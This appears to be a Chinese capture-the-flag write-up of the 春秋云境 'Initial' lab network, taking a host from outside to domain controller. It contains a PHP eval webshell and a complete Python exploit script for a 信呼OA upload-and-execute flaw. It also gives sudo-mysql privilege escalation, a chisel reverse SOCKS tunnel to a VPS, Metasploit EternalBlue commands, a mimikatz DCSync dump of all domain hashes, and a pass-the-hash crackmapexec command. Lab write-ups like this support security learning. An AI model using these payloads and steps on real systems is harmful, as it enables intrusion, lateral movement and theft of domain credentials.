[ 春秋云境 ] Initial 仿真场景

文章目录

靶标介绍：

Initial是一套难度为简单的靶场环境，完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag，各部分位于不同的机器上。

外网

打开给的网址, 有一个登录框

用fscan扫描一下可以发现存在两个端口, 80和22
80端口的网站是thinkphp的框架, 用工具扫一下getshell
上蚁剑连一下

可以发现当前的权限是 www-data

肯定是需要提权的
sudo -l

可以发现存在一个root权限并且没有密码的mysql

利用mysql进行提权 sudo mysql -e '\! whoami'

拿到第一个flag

复制代码

flag01:  flag{60b53231-

给了我们一个提示

the next flag may be in a server in the internal network.

可以看到它的内网网段

172.22.1.0/24

将fscan上传上去, 进行扫描

内网基本信息

复制代码

172.22.1.2 DC域控

172.22.1.21 存在MS17-010永恒之蓝

172.22.1.18 信呼OA系统

内网

使用chisel建立socks5代理, 以使本地能够访问到内网资源

chisel服务端 (vps)

复制代码

./chisel server -p 6666 --reverse

首先，服务器端监听6666端口，然后使用reverse参数，reverse表示的是服务端使用反向模式，也就是流量转到哪个端口由客户端直接指定的

客户端(受控主机)

复制代码

./chisel client vps:6666 R:0.0.0.0:9383:socks

将受控主机作为client，然后连接vps:6666，把所有流量通过vps:6666进行转发，然后把vps:9383端口作为socks5代理

运行完之后就可以在本地电脑进行socks5代理, 连接 vps:9383 实现对内网资源的访问

使用proxifier进行代理

然后就可以直接用浏览器访问内网地址了

信呼oa

这个版本信呼OA存在后台的漏洞

复制代码

https://blog.51cto.com/u_15847702/5827475

弱口令 admin / admin123可以登录进去

poc脚本

再在同一目录下建一个1.php

<?=eval($_POST[1]);?>

python 复制代码

import requests


session = requests.session()

url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'

data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=',
    'adminpass': 'YWRtaW4xMjM=',
    'yanzm': ''
}


r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})

filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
print(id)
print(filepath)
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'

r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)

运行后会有一个路由打印处理 /upload/2025-03/29_15374987.php

访问这个路由, 用蚁剑连接

可以拿到flag2

复制代码

flag02: 2ce3-4813-87d4-

永恒之蓝

然后就是内网的另外一台主机了, 存在永恒之蓝的漏洞, 直接msf打

不过要先配一下代理

复制代码

sudo vim /etc/proxychains4.conf

然后就进入msf打永恒之蓝

复制代码

proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit

可以看到拿到了一个shell

hash传递

抓取用户的hash

shell 复制代码

load kiwi  #加载 Kiwi 模块
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit

# kiwi_cmd  执行mimikatz的命令，后面接mimikatz.exe的命令
# lsadump::dcsync → 执行 DCSync 攻击，从域控制器拉取凭据信息。
# /domain:xiaorang.lab → 目标 Active Directory 域名是 xiaorang.lab。
# /all → 获取 域内所有用户 的凭据数据（包括 NTLM Hash、Kerberos Key）。
# /csv → 以 CSV 格式 输出数据，方便导出分析。
# exit 退出当前会话

抓取到了Administrator用户的hash

使用crackmapexec打hash传递

shell 复制代码

proxychains4 crackmapexec smb 172.22.1.2 -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

# crackmapexec smb：使用 SMB 协议 进行攻击（通常用于 Windows 文件共享和远程命令执行）
# -H <hash>：使用 NTLM 哈希认证（Pass-the-Hash 攻击）
# -d 指定AD域名
# -x 远程执行Windows cmd命令

复制代码

flag03: e8f88d0d43d6}

浪费了很多时间在代理上面, 不知道为什么前面一直连不上

参考文章:

复制代码

https://fushuling.com/index.php/2023/08/27/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83%C2%B7initial/